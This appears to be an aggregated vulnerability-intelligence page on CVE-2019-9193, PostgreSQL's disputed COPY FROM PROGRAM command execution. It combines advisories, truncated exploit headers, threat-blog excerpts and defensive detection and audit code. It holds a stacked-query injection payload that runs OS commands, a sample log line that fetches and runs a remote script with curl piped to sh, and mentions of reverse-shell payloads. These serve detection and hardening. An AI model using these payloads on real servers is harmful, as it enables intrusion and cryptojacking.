CVE-2019-9193
Published: 2019-04-01
Priority: P1 · 81 · high · CVSS 3.0 7.2
CVSS vector: AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
Tags: ITW EXPLOIT · VulnCheck KEV · Initial access
Exploited in the wild
EPSS: 91.88% (99.8th percentile)
In PostgreSQL 9.3 through 11.2, the "COPY TO/FROM PROGRAM" function allows superusers and users in the 'pg_execute_server_program' group to execute arbitrary code in the context of the database's operating system user. This functionality is enabled by default and can be abused to run arbitrary operating system commands on Windows, Linux, and macOS. NOTE: Third parties claim/state this is not an issue because PostgreSQL functionality for ‘COPY TO/FROM PROGRAM’ is acting as intended. References state that in PostgreSQL, a superuser can execute commands as the server user without using the ‘COPY FROM PROGRAM’.
Affected
1 range
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| postgresql | postgresql | 9.3 – 11.2 | — |
Detection & IOCs (extracted from sources)
IOCs:
- command: '; DROP TABLE IF EXISTS cmd_exec; CREATE TABLE cmd_exec(cmd_output text); COPY cmd_exec FROM PROGRAM 'id'; SELECT * FROM cmd_exec;--
- sigma: rule referenced by the source
- regex: ((u|g)id|groups)=[0-9]{1,4}\([a-z0-9]+\)
Detections:
- Alert on brute-force authentication attempts against PostgreSQL (port 5432) using the default 'postgres' username, particularly with common passwords such as '112233' and '1q2w3e4r'.
- Detect DreamBus ELF binaries with modified UPX headers: the standard UPX magic bytes 0x21585055 ('UPX!') are replaced with non-ASCII values such as 0x3330dddf. Flag ELF binaries where the UPX header magic does not match the standard signature.
- Monitor for processes impersonating 'tracepath' that are not the legitimate system binary, particularly those spawned from PostgreSQL server processes or located in writable temp directories.
- Flag HTTP requests with a User-Agent string of a single hyphen ('-') character, which is the hardcoded cURL user-agent used by DreamBus modules for C2 communications.
- Detect WildFire-style behavioral indicators: self-deletion of the initial payload binary and process name impersonation (e.g., renaming to 'tracepath') shortly after execution from a PostgreSQL context.
- In PostgreSQL audit logs, alert on any use of 'COPY ... FROM PROGRAM' SQL statements, especially when issued by the 'postgres' superuser account from a remote session.
Caveats:
- CVE-2019-9193 is a disputed CVE. The PostgreSQL community argues that 'COPY TO/FROM PROGRAM' is functioning as intended and is not a vulnerability, provided superuser privileges are not granted to remote or untrusted users. Detection should be tuned to context (remote superuser sessions) to avoid false positives on legitimate administrative use.
- The PGMiner C2 mining pool was no longer active at time of analysis, so profit/scale data is unavailable and the specific mining pool IOCs may not be actionable for current detections.
- At time of publication, none of the VirusTotal vendors detected PGMiner, meaning AV/EDR signature-based detections may be ineffective; behavioral and network-based detections are preferred.
- The DreamBus UPX header modification (replacing 0x21585055 with values like 0x3330dddf) breaks the standard UPX unpacking tool, so automated unpacking pipelines relying on the UPX CLI may fail to analyze these samples.
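The audit-log rule and the id/groups output regex above, worked through as an added example (this is not code from any of the sources on this page): a small Python detector run over constructed PostgreSQL log lines. It assumes `log_statement = 'all'` and `log_line_prefix = '%m [%p] %u@%d %r '`, so each statement line carries the user, database and client address, with `[local]` for Unix-socket sessions, plus a configurable set of privileged role names. Severity is tuned the way the caveat above suggests: a remote session by a privileged role ranks highest, legitimate local administrative use lowest. Multi-line statements, which PostgreSQL continues on tab-indented lines, are joined before matching. The log lines are constructed for the example.

```python
import re
from dataclasses import dataclass

# Assumed logging configuration (not stated on this page):
#   log_statement = 'all'
#   log_line_prefix = '%m [%p] %u@%d %r '
# %r expands to "host(port)" for TCP sessions and "[local]" for Unix-socket sessions.
LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \S+ \S+) \[(?P<pid>\d+)\] "
    r"(?P<user>[^@\s]+)@(?P<db>\S+) (?P<remote>\S+) (?P<level>[A-Z]+):\s+(?P<msg>.*)$",
    re.S,
)
# COPY ... FROM PROGRAM / COPY ... TO PROGRAM; case-insensitive, may span continuation lines.
COPY_PROGRAM_RE = re.compile(r"\bCOPY\b.*?\b(?:FROM|TO)\s+PROGRAM\b", re.I | re.S)
# Output of id/groups as it lands in the cmd_exec table (the regex from this page's IOC list).
ID_OUTPUT_RE = re.compile(r"((u|g)id|groups)=[0-9]{1,4}\([a-z0-9]+\)")

# Constructed log lines for the example (not captured from a real incident).
SAMPLE_LOG = [
    "2020-12-10 08:15:02.123 UTC [4211] postgres@postgres 203.0.113.7(51234) LOG:  statement: "
    "DROP TABLE IF EXISTS cmd_exec; CREATE TABLE cmd_exec(cmd_output text); "
    "COPY cmd_exec FROM PROGRAM 'id'; SELECT * FROM cmd_exec;",
    "2020-12-10 08:15:02.140 UTC [4211] postgres@postgres 203.0.113.7(51234) LOG:  statement: DROP TABLE cmd_exec;",
    "2020-12-10 08:20:11.001 UTC [4300] dba@inventory [local] LOG:  statement: "
    "COPY inventory TO PROGRAM 'gzip > /backup/inventory.gz';",
    "2020-12-10 08:21:00.500 UTC [4350] app@inventory 10.0.0.5(40112) LOG:  statement: "
    "SELECT * FROM items WHERE sku = 'A-100';",
    "2020-12-10 08:22:00.900 UTC [4360] app@inventory 10.0.0.5(40113) LOG:  statement: "
    "COPY items FROM '/var/lib/postgresql/items.csv' CSV;",
    "2020-12-10 08:25:30.250 UTC [4400] svc@inventory 198.51.100.9(33000) LOG:  duration: 12.4 ms  statement: COPY cmd_exec",
    "\tFROM PROGRAM 'curl -A - http://198.51.100.9/x.sh | sh';",
]


@dataclass
class Alert:
    severity: str
    user: str
    remote: str
    statement: str


def iter_records(lines):
    """Join each log line with its tab/space-indented continuation lines (multi-line statements)."""
    buf = None
    for line in lines:
        if line[:1] in (" ", "\t") and buf is not None:
            buf += "\n" + line
        else:
            if buf is not None:
                yield buf
            buf = line
    if buf is not None:
        yield buf


def detect_copy_program(lines, privileged_roles=frozenset({"postgres"})):
    """Return one Alert per logged statement that uses COPY ... FROM/TO PROGRAM.

    Severity: remote session by a privileged role -> high; remote session by any other
    role (which must therefore hold pg_execute_server_program) -> medium; local -> low.
    """
    alerts = []
    for rec in iter_records(lines):
        m = LINE_RE.match(rec)
        if not m:
            continue
        msg = m.group("msg")
        idx = msg.find("statement:")          # also covers "duration: ... statement:" lines
        if idx < 0:
            continue
        stmt = msg[idx + len("statement:"):].strip()
        if not COPY_PROGRAM_RE.search(stmt):  # plain COPY FROM '/file' does not match
            continue
        user, remote = m.group("user"), m.group("remote")
        is_remote = remote != "[local]"
        if is_remote and user in privileged_roles:
            sev = "high"
        elif is_remote:
            sev = "medium"
        else:
            sev = "low"
        alerts.append(Alert(sev, user, remote, stmt))
    return alerts


def looks_like_id_output(text):
    """True if text contains id/groups output, i.e. the attacker read back the cmd_exec table."""
    return bool(ID_OUTPUT_RE.search(text))


if __name__ == "__main__":
    for a in detect_copy_program(SAMPLE_LOG):
        print(a.severity, a.user, a.remote, a.statement[:60])
```

The file-based `COPY items FROM '/var/...'` line produces no alert, which is the false-positive case the caveat above warns about; the `privileged_roles` set should be populated from `pg_roles` rather than hard-coded to `postgres` in production.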
CVSS provenance
- NVD v3.0: 7.2 HIGH (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H)
- NVD v2.0: 9.0 HIGH (AV:N/AC:L/Au:S/C:C/I:C/A:C)
- VulnCheck: 7.2 HIGH
- Red Hat: 7.2 HIGH
GHSA
GHSA-j83j-hfqj-cf5p (ghsa_unreviewed, 2022-05-13, CWE-78, HIGH): ** DISPUTED **, followed by the NVD description above.
VulnCheck
postgresql postgresql: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') (vulncheck, 2019, CVSS 7.2 HIGH)
Description: the NVD text above.
Affected: postgresql postgresql
Required Action: Apply remediations o
Red Hat
postgresql: Command injection via "COPY TO/FROM PROGRAM" function (vendor_redhat, 2019-03-20, CVSS 7.2 HIGH, CWE-20)
Description: the NVD text above.
Statement: The PostgreSQL Project does not consider this to be a vulnerability. By design, database super users have
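One way to act on the PostgreSQL Project's position (superuser is by design able to run OS commands, so the question is who holds that power and from where), as an added example that is not part of the Red Hat entry or of PostgreSQL itself: a Python audit that lists which roles can reach COPY ... PROGRAM (superusers, and on PostgreSQL 11+ transitive members of pg_execute_server_program) and whether pg_hba.conf could let any of them log in over TCP from a non-loopback address. The pure-logic functions take rows shaped like pg_roles, pg_auth_members (joined to names) and pg_hba_file_rules (PostgreSQL 10+). The sample rows, the `fetch_live` helper and its dsn are assumptions for illustration; pg_hba's first-match evaluation against a concrete client address is not reproduced, so any TCP rule that could admit the role from a non-loopback address is flagged.

```python
from collections import defaultdict

# PostgreSQL 11+ predefined role that grants COPY ... TO/FROM PROGRAM to non-superusers.
# On 9.3 through 10 the role does not exist and only superusers qualify.
OS_EXEC_ROLE = "pg_execute_server_program"
LOOPBACK = {"127.0.0.1", "::1", "samehost"}

# Constructed sample rows (assumptions, not data from any source on this page).
# pg_roles: (rolname, rolsuper, rolcanlogin)
ROLES = [
    ("postgres", True, True),
    ("dba", False, True),
    ("app", False, True),
    ("etl", False, True),
    ("ops", False, False),
    (OS_EXEC_ROLE, False, False),
]
# pg_auth_members joined to names: (member, role); etl reaches the role via ops
MEMBERSHIPS = [("dba", OS_EXEC_ROLE), ("etl", "ops"), ("ops", OS_EXEC_ROLE)]
# pg_hba_file_rules: (type, database, user_name, address, netmask, auth_method), in file order
HBA_RULES = [
    ("local", ["all"], ["all"], None, None, "peer"),
    ("host", ["all"], ["all"], "127.0.0.1", "255.255.255.255", "md5"),
    ("host", ["all"], ["postgres"], "0.0.0.0", "0.0.0.0", "md5"),
    ("hostssl", ["inventory"], ["app", "etl"], "10.0.0.0", "255.255.255.0", "scram-sha-256"),
    ("host", ["all"], ["all"], "0.0.0.0", "0.0.0.0", "reject"),
]


def os_exec_roles(roles, memberships):
    """Roles that can run COPY ... PROGRAM: superusers plus transitive members of OS_EXEC_ROLE."""
    members_of = defaultdict(set)
    for member, role in memberships:
        members_of[role].add(member)
    reachable, stack = set(), [OS_EXEC_ROLE]
    while stack:
        for m in members_of[stack.pop()]:
            if m not in reachable:
                reachable.add(m)
                stack.append(m)
    return {name for name, rolsuper, _ in roles if rolsuper} | reachable


def rule_exposes_remotely(role, rule):
    """True if this pg_hba rule could admit `role` over TCP from a non-loopback address.

    Group entries (+grp) and regex user names are not evaluated (assumption: plain names).
    """
    typ, _dbs, users, address, _netmask, method = rule
    if typ == "local" or method == "reject":
        return False
    if address in LOOPBACK:
        return False
    return "all" in users or role in users


def audit(roles, memberships, hba_rules):
    """(role, rule) pairs where an OS-command-capable login role is reachable over the network."""
    can_login = {name for name, _, rolcanlogin in roles if rolcanlogin}
    findings = []
    for role in sorted(os_exec_roles(roles, memberships) & can_login):
        findings.extend((role, rule) for rule in hba_rules if rule_exposes_remotely(role, rule))
    return findings


def fetch_live(dsn):
    """Hypothetical helper: pull the same three row shapes from a live server (psycopg2, PostgreSQL 10+)."""
    import psycopg2  # imported here so the offline example does not need the driver installed
    with psycopg2.connect(dsn) as conn, conn.cursor() as cur:
        cur.execute("SELECT rolname, rolsuper, rolcanlogin FROM pg_roles")
        roles = cur.fetchall()
        cur.execute("SELECT m.rolname, r.rolname FROM pg_auth_members am "
                    "JOIN pg_roles m ON m.oid = am.member JOIN pg_roles r ON r.oid = am.roleid")
        memberships = cur.fetchall()
        cur.execute("SELECT type, database, user_name, address, netmask, auth_method "
                    "FROM pg_hba_file_rules")
        rules = cur.fetchall()
    return roles, memberships, rules


if __name__ == "__main__":
    for role, rule in audit(ROLES, MEMBERSHIPS, HBA_RULES):
        print(f"{role}: reachable via {rule[0]} {rule[3]}/{rule[4]} {rule[5]} users={rule[2]}")
```

On the sample rows `dba` holds pg_execute_server_program but only has loopback and Unix-socket entries, so it is not reported; `postgres` (world-reachable over md5) and `etl` (reachable from 10.0.0.0/24 through its membership in `ops`) are. Either finding is the configuration the PostgreSQL Project's statement tells you not to have.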
Exploit-DB
PostgreSQL 9.6.1 - Remote Code Execution (RCE) (Authenticated) (exploitdb, 2023-04-05, CVSS 7.2 HIGH)
---
# Exploit Title: PostgreSQL 9.6.1 - Remote Code Execution (RCE) (Authenticated)
# Date: 2023-02-01
# Exploit Author: Paulo Trindade (@paulotrindadec), Bruno Stabelini (@Bruno Stabelini), Diego Farias (@fulcrum) and Weslley Shaimon
# Github: https://github.com/paulotrindadec/CVE-2019-9193
# Version: PostgreSQL 9.6.1 on x86_64-pc-linux-gnu
# Tested on: Red Hat Enterprise Linux Server 7.9
# CVE: CVE-2019–9193
#!/usr/bin/python3
import sys
import psycopg2
import argparse
def parseArgs():
parser = argparse.ArgumentParser(description='PostgreSQL 9.6.1 Authenticated Remote Code Execution')
parser.add_argument('-i', '--ip', nargs='?', type=str, default='127.0.0.1', help='The IP address of the PostgreSQL DB [Default: 127.0.0.1
Exploit-DB
PostgreSQL 9.3-11.7 - Remote Code Execution (RCE) (Authenticated) (exploitdb, 2022-03-30)
---
# Exploit Title: PostgreSQL 9.3-11.7 - Remote Code Execution (RCE) (Authenticated)
# Date: 2022-03-29
# Exploit Author: b4keSn4ke
# Github: https://github.com/b4keSn4ke
# Vendor Homepage: https://www.postgresql.org/
# Software Link: https://www.postgresql.org/download/linux/debian/
# Version: 9.3 - 11.7
# Tested on: Linux x86-64 - Debian 4.19
# CVE: CVE-2019–9193
#!/usr/bin/python3
import psycopg2
import argparse
import hashlib
import time
def parseArgs():
parser = argparse.ArgumentParser(description='CVE-2019–9193 - PostgreSQL 9.3-11.7 Authenticated Remote Code Execution')
parser.add_argument('-i', '--ip', nargs='?', type=str, default='127.0.0.1', help='The IP address of the PostgreSQL DB [Default: 127.0.0.1]')
par
Exploit-DB
PostgreSQL 9.3 - COPY FROM PROGRAM Command Execution (Metasploit) (exploitdb, 2019-05-08)
---
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core/exploit/postgres'
class MetasploitModule 'PostgreSQL COPY FROM PROGRAM Command Execution',
'Description' => %q(
Installations running Postgres 9.3 and above have functionality which allows for the superuser
and users with 'pg_execute_server_program' to pipe to and from an external program using COPY.
This allows arbitrary command execution as though you have console access.
This module attempts to create a new table, then execute system commands in the context of
copying the command output into the table.
This module should work on all Postgres systems running
Nuclei
PostgreSQL 9.3-12.3 Authenticated Remote Code Execution (nuclei, CVSS 7.2 HIGH)
Description: the NVD text above.
Template:
id: CVE-2019-9193
info:
name: PostgreSQL 9.3-12.3 Authenticated Remote Code Execution
author: pussycat0x
severity:
Metasploit
PostgreSQL COPY FROM PROGRAM Command Execution (metasploit)
Installations running Postgres 9.3 and above have functionality which allows for the superuser and users with 'pg_execute_server_program' to pipe to and from an external program using COPY. This allows arbitrary command execution as though you have console access. This module attempts to create a new table, then execute system commands in the context of copying the command output into the table. This module should work on all Postgres systems running version 9.3 and above. For Linux & OSX systems, target 1 is used with cmd payloads such as: cmd/unix/reverse_perl. For Windows systems, target 2 is used with powershell payloads such as: cmd/windows/powershell_reverse_tcp. Alternatively target 3 can be used to execute generic commands, such as a web
Bugzilla
CVE-2019-9193 postgresql: Command injection via "COPY TO/FROM PROGRAM" function [fedora-all] (bugzilla, 2019-04-04, CVSS 7.2 HIGH)
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of fedora-all.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next
comment(s). This will include the bug IDs of this tracking bug as well as
the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
fedpkg commit message.
NOTE: this issue affects multiple sup
Bugzilla
CVE-2019-9193 mingw-postgresql: postgresql: Command injection via "COPY TO/FROM PROGRAM" function [epel-7] (bugzilla, 2019-04-04, CVSS 7.2 HIGH)
Discussion:
Use the follow
Bugzilla
CVE-2019-9193 mingw-postgresql: postgresql: Command injection via "COPY TO/FROM PROGRAM" function [fedora-all] (bugzilla, 2019-04-04, CVSS 7.2 HIGH)
Bugzilla
CVE-2019-9193 postgresql: Command injection via "COPY TO/FROM PROGRAM" function (bugzilla, 2019-04-04, CVSS 7.2 HIGH)
In PostgreSQL 9.3 through 11.2, the "COPY TO/FROM PROGRAM" function allows superusers and users in the 'pg_execute_server_program' group to execute arbitrary code in the context of the database's operating system user. This functionality is enabled by default and can be abused to run arbitrary operating system commands on Windows, Linux, and macOS.
References:
https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5
Discussion:
Created mingw-postgresql tracking bugs for this issue:
Affects: epel-7 [bug 1695984]
Affects: fedora-all [bug 1695985]
Created postgresql tracking bugs for this issue:
Affects: fedora-all [bug 1695983]
---
The position of
Zscaler
Malware Analysis of the DreamBus Botnet | Zscaler Blog (blogs_zscaler, 2021-01-22)
Checkpoint
14th December – Threat Intelligence Bulletin (blogs_checkpoint, 2020-12-14; tagged CVE-2020-1971)
## 14th December – Threat Intelligence Bulletin
For the latest discoveries in cyber research for the week of 14th December, please download our Threat Intelligence Bulletin .
Top Attacks and Breaches
The US Treasury Department and US Department of Commerce were victims of a cyberattack compromising their internal email traffic. Perhaps related , SolarWinds IT management software has been exploited in a supply chain attack, adding malicious code to its software updates released between March and June 2020.
Unit42
PGMiner: New Cryptocurrency Mining Botnet Delivered via PostgreSQL (blogs_unit42, 2020-12-10, CVSS 7.2 HIGH)
Xiao Zhang, Yang Ji, Jim Fitzgerald, Yue Chen, Claud Xiao · Published: December 10, 2020
Tags: Malware, Threat Research, Vulnerabilities, Cryptocurrency mining, Cryptojacking, Exploit, PostgreSQL
## Executive Summary
Cryptojacking (or simply malicious coin mining) is a common way for malware authors to monetize their operations. While the underlying mining protocols and techniques remain fairly standard, malware actors tend to seek out and find smarter ways to hack into a victim's machines. Recently, Unit 42 researchers uncovered a novel Linux-based cryptocurrency mining botnet that exploits a disputed PostgreSQL remote code execution (RCE) vulnerability that compromises database servers for cryptojacking. We named the cryptocurrency mining botnet "PGMiner" after its delivery channel and mining behavior. At its core, PGMiner attempts to connect to the mining pool for Monero mining. Because the mining pool is not active anymore, we could not recover information about the actual pro
CTF
techniques / sql-injection (ctf_writeups)
# SQL Injection (SQLi)
## Overview
SQL Injection occurs when untrusted user input is directly concatenated into a backend database query without proper sanitization or parameterization. This allows an attacker to manipulate the structure of the SQL query to bypass authentication, read unauthorized data, modify records, or execute arbitrary code on the database server.
## When This Happens
- User input is concatenated into queries: `SELECT * FROM users WHERE username = '` + $_GET['user'] + `'`
- Prepared statements are used incorrectly, or specific fields (like `ORDER BY` or `LIMIT`) are not parameterized.
- Data from secondary sources (like HTTP headers or databases) is trusted without validation (Second-Order SQLi).
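The concatenation pattern above, worked through in Python with sqlite3 as a stand-in database (an added example, not code from the writeup): `build_query_unsafe` is the vulnerable form, `lookup_safe` the parameterized form. Fed the COPY FROM PROGRAM payload from this page's IOC list, concatenation closes the original string literal and starts new statements, which is exactly what the PostgreSQL exploits on this page rely on (libpq's simple query protocol runs every statement in the string); parameterization hands the whole payload over as a literal username instead. The users table and its rows are constructed for the example, and because sqlite3 has no COPY, the stacked payload is shown as the statement list the server would parse rather than executed.

```python
import sqlite3

# Constructed payloads: the stacked-query payload from this page's IOC list, and a classic auth bypass.
PAYLOAD_RCE = ("'; DROP TABLE IF EXISTS cmd_exec; CREATE TABLE cmd_exec(cmd_output text); "
               "COPY cmd_exec FROM PROGRAM 'id'; SELECT * FROM cmd_exec;--")
PAYLOAD_BYPASS = "' OR '1'='1"


def build_query_unsafe(username):
    """Vulnerable form: the caller's input is spliced into the statement text."""
    return "SELECT id, username FROM users WHERE username = '" + username + "'"


def setup_db():
    """In-memory sqlite3 stand-in for the backend, with two constructed users."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users(id INTEGER PRIMARY KEY, username TEXT NOT NULL)")
    conn.executemany("INSERT INTO users(username) VALUES (?)", [("alice",), ("bob",)])
    return conn


def lookup_unsafe(conn, username):
    """Runs the concatenated statement; attacker input decides what the query means."""
    return conn.execute(build_query_unsafe(username)).fetchall()


def lookup_safe(conn, username):
    """Parameterized form: the value travels separately from the SQL and can never become SQL."""
    return conn.execute("SELECT id, username FROM users WHERE username = ?", (username,)).fetchall()


def split_statements(sql):
    """Quote-aware split on ';' to show how many statements a server would parse from `sql`.

    Toggling on every single quote treats the SQL-standard '' escape correctly (two toggles).
    A trailing "--" comment swallows whatever the application appended, here the closing quote.
    """
    parts, cur, in_quote = [], [], False
    for ch in sql:
        if ch == "'":
            in_quote = not in_quote
        if ch == ";" and not in_quote:
            parts.append("".join(cur).strip())
            cur = []
        else:
            cur.append(ch)
    tail = "".join(cur).strip()
    if tail:
        parts.append(tail)
    return [p for p in parts if p]


if __name__ == "__main__":
    conn = setup_db()
    print("bypass, unsafe:", lookup_unsafe(conn, PAYLOAD_BYPASS))   # both users
    print("bypass, safe:  ", lookup_safe(conn, PAYLOAD_BYPASS))     # no such user
    for i, stmt in enumerate(split_statements(build_query_unsafe(PAYLOAD_RCE))):
        print(i, stmt)
```

The split shows the original SELECT reduced to `username = ''`, then the attacker's DROP/CREATE/COPY/SELECT as four further statements; with a PostgreSQL driver such as psycopg2 that whole string is sent in one `execute` call, which is why a single injectable parameter is enough for the cmd_exec technique.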
---
## Recon / Detection
### 1. Identify Input Vectors
Test all para
References
- http://packetstormsecurity.com/files/152757/PostgreSQL-COPY-FROM-PROGRAM-Command-Execution.html
- http://packetstormsecurity.com/files/166540/PostgreSQL-11.7-Remote-Code-Execution.html
- http://packetstormsecurity.com/files/171722/PostgreSQL-9.6.1-Remote-Code-Execution.html
- https://blog.hagander.net/when-a-vulnerability-is-not-a-vulnerability-244/
- https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5
- https://paquier.xyz/postgresql-2/postgres-9-3-feature-highlight-copy-tofrom-program/
- https://security.netapp.com/advisory/ntap-20190502-0003/
- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/authenticated-arbitrary-command-execution-on-postgresql-9-3/